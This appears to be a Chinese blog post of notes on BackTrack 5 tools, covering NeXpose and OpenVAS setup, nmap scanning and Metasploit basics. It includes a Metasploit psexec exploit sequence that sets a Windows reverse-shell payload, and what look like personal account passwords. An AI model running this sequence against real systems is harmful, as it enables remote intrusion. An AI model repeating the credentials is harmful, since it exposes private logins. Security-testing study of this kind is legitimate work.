欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

BT5中的常见工具操作技巧总结

程序员文章站 2022-04-09 15:08:18
通过nmap,nessus,openvas,nexpose,获取CVE,BID,其它描述信息,到exploit-db.com,1337.com搜索是否有攻击代码。 0. 防火墙:ufw,gu...

通过nmap,nessus,openvas,nexpose,获取CVE,BID,其它描述信息,到exploit-db.com,1337.com搜索是否有攻击代码。

0. 防火墙:ufw,gufw
MetaSploitFramework:
exploits:使用PAYLOAD的模块,不使用PAYLOAD的模块则为Auxiliary
payload:在远程目标主机运行的代码
encoders:辅助PAYLOADS到达目标主机
Nops:充实PAYLOAD的尺寸
############################
nessus 生成的报告格式选择.nessus(v1)
使用expliot示例:
1)use exploit/windows/smb/psexec
set RHOST remoteip
set PAYLOAD windows/shell/reverse_tcp  #设置payload,即在远程目标主机运行的代码,一般选择提供远程网络服务或者反向连接的
set LHOST listenip#当PAYLOAD是反向连接时要设置
set LPORT 4444
set etc…
exploit
 ########################################################################
1. NeXpose
由rapid7收购msf后的扫描器,与msf对应,exploitable的漏洞有msf之类的攻击链接。
NeXpose默认的postgresql用户为nxpgsql, port:3780,扫描数量限制在8台
生成的报告格式选择nexpose simple xml.
nxadmin:A
启动:
Go to the directory that contains the script that starts NeXpose:
$ cd [installation_directory]/nsc
3. Type the command to run the script:
$ ./nsc.sh
可看到运行的后台提示
或者
/etc/init.d/nexposed restart 启动
WEB访问:
http://ip:3780
其中nexposed的来历:
$ cd [installation_directory]/nsc
Open the nexposeconsole.rc file in your preferred text editing program.
 Look for two consecutive lines that read:
#defines
NXP_ROOT=/opt/rapid7/nexpose
The directory in the second line is the default installation directory.
NeXpose Software Installation and Quick-start Guide 16
If you did not use the default directory for installation, change the directory path to the one you chose:
#defines
NXP_ROOT=[installation_directory]
Save and close the nexposeconsole.rc file.
Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name:
$ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name]
Ensure that the daemon can run:
$ chmod +x /etc/init.d/[daemon-name]
Make the daemon start when the operating systems starts:
$ update-rc.d [daemon_name] defaults
Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu
To manually start, stop, or restart NeXpose as a daemon:
$ /etc/init.d/[daemon_name] <start|stop|restart>
卸载NeXpose:
1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program.
If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell
in which you are running NeXpose.
If you are running NeXose as a daemon, see Manually starting, stopping, or restarting NeXpose as a daemon in
Ubuntu (on page 16).
2. Run the command to remove the program:
$ rm -fr [installation_directory]
####################################################
2. openvas:
root:shift(AB) loal id pwd is A
wangql:wangql#@!
开启:
命令行输入:
openvassd
openvasmd
openvasad
gsad –http-only -a 127.0.0.1 -p 9392
openvasmd:manager,9390
openvasmd [OPTION...] – Manager of the Open Vulnerability Assessment System
gsad:greenbone security assistant daemon,9392
gsad –http-only -a 127.0.0.1 -p 9392 #这样才能启动gsad并可从WEB访问w
caution: there is a violation between NeXpose and OpenVAS, especially the above gsad command ,so uninstall the nexpose before use the gsad.

openvasad:administrator添加用户,9393
9390,9391,9392,9393
FIX: Start OpenVAS Scanner (openvassd).
FIX: Start OpenVAS Manager (openvasmd).
FIX: Start OpenVAS Administrator (openvasad).
FIX: Start Greenbone Security Assistant (gsad).
####################################################
3.nessus
4.nmap
nmap -A -T4 192.168.10.3-254 -p 135
5.load xmlrpc
用armitage打开
msf console 不支持中文编码显示
info exploit/windows/wins/ms04_045_ins